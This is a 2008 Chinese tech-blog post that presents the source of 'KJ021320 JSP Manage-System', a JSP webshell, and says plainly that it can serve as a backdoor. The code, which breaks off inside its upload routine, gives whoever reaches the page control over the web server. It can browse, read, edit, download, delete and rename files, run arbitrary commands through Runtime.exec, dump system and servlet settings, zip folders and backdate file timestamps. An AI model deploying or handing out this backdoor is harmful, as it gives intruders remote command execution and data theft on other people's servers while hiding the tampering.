技术教程

Jsp文件管理工具

作者: Corbie  日期: 2008-07-03 15:57

字体大小:
attachments/200807/1875342089.jpg

可以当jsp后门使用,代码如下:




下载: shell.jsp
  1. <%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%>
  2. <%@page pageEncoding="gbk"%>
  3. <%!
  4.  final String APP_NAME="KJ021320 JSP Manage-System 1.0";
  5.  int portListen=5000;//set the httpproxy port
  6.  boolean openHttpProxy=false;//set the httpproxy load-on-start-up
  7.  
  8.  //the main framwork
  9.  void mainForm(String web_Site,JspWriter out)throws Exception{
  10.  out.print("<table width=100% height=100% border=0 bgcolor=menu>");
  11.  out.print("<tr><td height=30 colspan=2>");
  12.  out.print("<table width=100% height=25 border=0>");
  13.  out.print("<form name=address method=post target=FileFrame onSubmit='checkUrl();'>");
  14.  out.print("<tr><td width=60 align=center>FilePath:</td><td>");
  15.  out.print("<input name=FolderPath style=width:100% value='"+web_Site+"' onchange='checkUrl();'>");
  16.  out.print("<input type=hidden name=Action value=F>");
  17.  out.print("<input type=hidden name=Filename>");
  18.  out.print("</td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a>");
  19.  out.print("</td></tr></form></table></td></tr><tr><td width=148>");
  20.  out.print("<iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td>");
  21.  out.print("<td width=600>");
  22.  out.print("<iframe name=FileFrame src='?Action=F&FolderPath="+web_Site+"' width=100% height=100% frameborder=1 scrolling=yes></iframe>");
  23.  out.print("</td></tr></table>");
  24.  }
  25.  //menu form to choose
  26.  void mainMenu(JspWriter out,String web_Site)throws Exception{
  27.  out.println("<table>");
  28.  out.println("<tr><td bgcolor=Gray><a href=?Action=M>"+ico(58)+"FileOperation(File.class)</a></td></tr>");
  29.  out.println("<tr><td bgcolor=menu onclick=top.address.FolderPath.value='"+folderReplace(web_Site)+"'><a href='?Action=F&FolderPath="+web_Site+"' target=FileFrame>"+ico(48)+"WEB Folder</a></td></tr>");
  30.  out.println("<tr><td bgcolor=menu><a href=?Action=S target=FileFrame>"+ico(53)+"SystemInfo(System.class)</a></td></tr>");
  31.  out.println("<tr><td bgcolor=menu><a href=?Action=L target=FileFrame>"+ico(53)+"ServletInfo</a></td></tr>");
  32.  out.println("<tr><td bgcolor=menu><a href=?Action=T target=FileFrame>"+ico(53)+"SystemTools</a></td></tr>");
  33.  out.println("<tr><td bgcolor=menu><a href=?Action=i target=FileFrame>"+ico(57)+"Interfaces</a></td></tr>");
  34.  out.println("<tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr>");
  35.  out.println("</table>");
  36.  }
  37.  //show all files and folders
  38.  void showFiles(JspWriter out,String path)throws Exception{
  39.  File file=new File(path);
  40.  long maxSize=0;
  41.  if(file.isDirectory()&&file.exists()){
  42.  File[] f=file.listFiles();
  43.  out.println("<table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr>");
  44.  for(int i=0;i<f.length;i++){
  45.  maxSize=maxSize+f[i].length();
  46.  if(f[i].isDirectory())
  47.  out.println("<tr bgcolor=menu><td><a href=\"javascript:top.address.FolderPath.value='"+folderReplace(f[i].getAbsolutePath())+"/';checkUrl();\">"+ico(48)+f[i].getName()+"</a></td><td> DIR </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(true,f[i].getAbsolutePath())+"</td></tr>");
  48.  else
  49.  out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(false,f[i].getAbsolutePath())+"</td></tr>");
  50.  }
  51.  out.println("</table>");
  52.  out.print("this folder size:"+getSize(maxSize));
  53.  }
  54.  }
  55.  //show the system information
  56.  void showSystemInfo(JspWriter out)throws Exception{
  57.  Map map=null;
  58.  Set set=null;
  59.  Iterator it=null;
  60.  
  61.  /*use for jdk1.5
  62. map=System.getenv();
  63. set=map.keySet();
  64. it=set.iterator();
  65. out.print("<hr>System Env info:<ul>");
  66. while(it.hasNext()){
  67. Object oName=it.next();
  68. out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
  69. }
  70. out.print("</ul>");
  71. */
  72.  
  73.  map=System.getProperties();
  74.  set=map.keySet();
  75.  it=set.iterator();
  76.  out.println("<hr>System Property info:<ul>");
  77.  while(it.hasNext()){
  78.  Object oName=it.next();
  79.  out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
  80.  }
  81.  out.print("</ul><hr>System CPU :");
  82.  out.print(Runtime.getRuntime().availableProcessors()+" <br>");
  83.  out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory()));
  84.  out.print("<br>the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory()));
  85.  }
  86.  //show servlet information
  87.  void servletInfo(ServletConfig config,JspWriter out)throws Exception{
  88.  ServletContext sc=config.getServletContext();
  89.  out.println("Server info: "+sc.getServerInfo()+"<br>");
  90.  out.println("ServletContext name: "+sc.getServletContextName()+"<br>");
  91.  out.println("Major version :"+sc.getMajorVersion()+"<br>");
  92.  out.println("Minor version :"+sc.getMinorVersion()+"<br>");
  93.  Enumeration en=sc.getInitParameterNames();
  94.  String initInfo="init parameter: <br>";
  95.  out.print(initInfo);
  96.  while(en.hasMoreElements()){
  97.  String name=(String)en.nextElement();
  98.  initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"<br>";
  99.  out.print(initInfo);
  100.  }
  101.  
  102.  }
  103.  //down the server file
  104.  void downFile(String filename,HttpServletResponse res)throws Exception{
  105.  int w=0;
  106.  byte[] buffer=new byte[256];
  107.  byte[] b=(new File(filename)).getName().getBytes();
  108.  String outFile=new String(b,"ISO-8859-1");
  109.  res.reset();
  110.  res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\"");
  111.  ServletOutputStream sos=res.getOutputStream();
  112.  BufferedInputStream bis=null;
  113.  try{
  114.  bis=new BufferedInputStream(new FileInputStream(filename));
  115.  while((w=bis.read(buffer,0,buffer.length))!=-1){
  116.  sos.write(buffer,0,w);
  117.  }
  118.  }catch(Exception e){
  119.  }finally{
  120.  if(bis!=null)bis.close();
  121.  }
  122.  sos.flush();
  123.  res.flushBuffer();
  124.  }
  125.  //delect file
  126.  void deleteFile(String filename,JspWriter out)throws Exception{
  127.  File f=new File(filename);
  128.  if(f.exists()){
  129.  if(f.delete())out.print(filename+"delete success...");
  130.  }else{
  131.  out.print("file not find!!");
  132.  }
  133.  }
  134.  //rename the file
  135.  void renameFile(String filename,JspWriter out)throws Exception{
  136.  int split=filename.indexOf("|");
  137.  String newFilename=filename.substring(split+1);
  138.  filename=filename.substring(0,split);
  139.  File f=new File(filename);
  140.  if(f.exists()){
  141.  if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success");
  142.  }else{
  143.  out.print("file not find!!");
  144.  }
  145.  }
  146.  //file copy
  147.  void copyFile(String filename,JspWriter out)throws Exception{
  148.  int split=filename.indexOf("|");
  149.  String newFilename=filename.substring(split+1);
  150.  filename=filename.substring(0,split);
  151.  File f=new File(filename);
  152.  BufferedInputStream bis=null;
  153.  BufferedOutputStream bos=null;
  154.  if(f.exists()){
  155.  try{
  156.  bis=new BufferedInputStream(new FileInputStream(filename));
  157.  bos=new BufferedOutputStream(new FileOutputStream(newFilename));
  158.  int s=0;
  159.  while((s=bis.read())!=-1){
  160.  bos.write(s);
  161.  }
  162.  }catch(Exception e){
  163.  out.print("file copy error");
  164.  }finally{
  165.  if(bis!=null)bis.close();
  166.  if(bos!=null)bos.close();
  167.  }
  168.  out.print(newFilename+"file copy success");
  169.  }else{
  170.  out.print("file not find!!");
  171.  }
  172.  }
  173.  //file editor
  174.  void editFile(String filename,JspWriter out)throws IOException{
  175.  File f=new File(filename);
  176.  out.print("<form method=post>File Path:");
  177.  out.print("<input type=text size=80 name=filename value='"+filename+"'>");
  178.  out.print("<input type=button name=kFile onClick='this.form.action=\"?Action=K\";this.form.submit();' value=KeepFile >");
  179.  out.print("<input type=button onClick=editFile(this.form.filename.value); value=ReadFile>");
  180.  out.print("<textarea name=FileContent rows=35 style=width:100%;>");
  181.  if(f.exists()){
  182.  try{
  183.  BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(filename),"Gb2312"));
  184.  String s="";
  185.  while((s=br.readLine())!=null){
  186.  out.println(htmlEntity(s));
  187.  }
  188.  }catch(Exception e){
  189.  out.print("file edit error");
  190.  }finally{
  191.  }
  192.  }
  193.  out.print("</textarea></form>");
  194.  }
  195.  //file save
  196.  void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{
  197.  if(filename!=null||fileContent!=null){
  198.  BufferedOutputStream bos=null;
  199.  try{
  200.  bos=new BufferedOutputStream(new FileOutputStream(filename));
  201.  bos.write(fileContent,0,fileContent.length);
  202.  }finally{
  203.  if(bos!=null)bos.close();
  204.  }
  205.  out.print(filename+"file save success");
  206.  }else{
  207.  out.print("Error");
  208.  }
  209.  }
  210.  //chang the file modify date
  211.  void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{
  212.  File f=new File(filename);
  213.  if(f.exists()){
  214.  Calendar calendar=Calendar.getInstance();
  215.  calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
  216.  if(f.setLastModified(calendar.getTimeInMillis()))
  217.  out.print(filename+"file date change success");
  218.  else
  219.  out.print(filename+"file date change error");
  220.  }else{
  221.  out.println("file not find!!!");
  222.  }
  223.  }
  224.  //run file
  225.  void execFile(String file,JspWriter out)throws Exception{
  226.  int i=0;
  227.  Runtime rt=Runtime.getRuntime();
  228.  Process ps=rt.exec(file);
  229.  InputStreamReader isr = null;
  230.  char[] bufferC=new char[1024];
  231.  try{
  232.  isr=new InputStreamReader(ps.getInputStream(),"GB2312");
  233.  out.print("<textarea rows=35 style=width:100%;>");
  234.  while((i=isr.read(bufferC,0,bufferC.length))!=-1){
  235.  out.print(htmlEntity(new String(bufferC,0,i)));
  236.  }
  237.  }catch(Exception e){
  238.  out.print("run file error");
  239.  }finally{
  240.  if(isr!=null)isr.close();
  241.  }
  242.  out.print("</textarea>");
  243.  systemTools(out);
  244.  }
  245.  //zip zhe folder
  246.  void zip(String zipPath, String srcPath,JspWriter out) throws Exception {
  247.  FileOutputStream output = null;
  248.  ZipOutputStream zipOutput = null;
  249.  try{
  250.  output = new FileOutputStream(zipPath);
  251.  zipOutput = new ZipOutputStream(output);
  252.  zipEntry(zipOutput,srcPath,srcPath,zipPath);
  253.  }catch(Exception e){
  254.  out.print("file zip error");
  255.  }finally{
  256.  if(zipOutput!=null)zipOutput.close();
  257.  }
  258.  out.print("zip ok"+zipPath);
  259.  }
  260.  //add the zip entry
  261.  void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception {
  262.  String entryName = filePath;
  263.  File f = new File(filePath);
  264.  if (f.isDirectory()){// check is folder
  265.  String[] files = f.list();
  266.  for(int i = 0; i < files.length; i++)
  267.  zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath);
  268.  return;
  269.  }
  270.  String chPh = initPath.substring(initPath.lastIndexOf("/") + 1);// ?????
  271.  int idx=initPath.lastIndexOf(chPh);
  272.  if (idx != -1) {
  273.  entryName = filePath.substring(idx);
  274.  }
  275.  ZipEntry entry;
  276.  entry = new ZipEntry(entryName);
  277.  File ff = new File(filePath);
  278.  if(ff.getAbsolutePath().equals(zipPath))return;
  279.  entry.setSize(ff.length());
  280.  entry.setTime(ff.lastModified());
  281.  //the CRC efficacy
  282.  entry.setCrc(0);
  283.  CRC32 crc = new CRC32();
  284.  crc.reset();
  285.  zipOs.putNextEntry(entry);
  286.  int len = 0;
  287.  byte[] buffer = new byte[2048];
  288.  int bufferLen = 2048;
  289.  FileInputStream input =null;
  290.  try{
  291.  input = new FileInputStream(filePath);
  292.  while ((len = input.read(buffer, 0, bufferLen)) != -1) {
  293.  zipOs.write(buffer, 0, len);
  294.  crc.update(buffer, 0, len);
  295.  }
  296.  }catch(Exception e){
  297.  }finally{
  298.  if(input!=null)input.close();
  299.  }
  300.  entry.setCrc(crc.getValue());
  301.  }
  302.  //file upload to server
  303.  void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{
  304.  String boundary = request.getContentType().substring(30);//?????
  305.  ServletInputStream sis=request.getInputStream();
  306.  BufferedOutputStream bos=null;
  307.  byte[] buffer = new byte[1024];
  308.  int line=-1;
  309.  for(int i=0;i<5;i++<